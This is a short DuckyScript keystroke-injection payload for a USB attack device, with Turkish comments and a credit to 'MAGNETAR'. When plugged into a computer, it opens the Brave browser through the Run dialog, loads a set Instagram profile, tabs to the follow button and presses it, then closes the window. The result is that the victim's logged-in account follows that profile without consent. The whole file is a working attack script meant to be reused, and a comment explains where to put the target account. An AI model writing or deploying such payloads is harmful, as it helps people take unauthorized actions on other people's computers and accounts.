REM Instagram Takip Payload'ı
REM Ayrica https://www.instagram.com/emrelimustafasezgin/ adresini takip edebilirsiniz.

REM Acilan Klasorun kapanmasi icin
DELAY 750
ALT F4

DELAY 3000
GUI r
DELAY 100
STRING brave
DELAY 1000
ENTER
DELAY 2000

REM Takip edilmek istenen instagram adresini iki "/" arasina yazin.
STRING https://www.instagram.com/magnetarge/
DELAY 1000
ENTER

REM Acilan sayfada takip butonuna erismek icin 12 defa TAB tusuna basiyoruz.
DELAY 5000
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100

REM Takip butonuna basmak için ENTER komutunu veriyoruz.
DELAY 1000
ENTER
DELAY 5000

REM Sekmeyi kapatmak için.
ALT F4

REM Made by MAGNETAR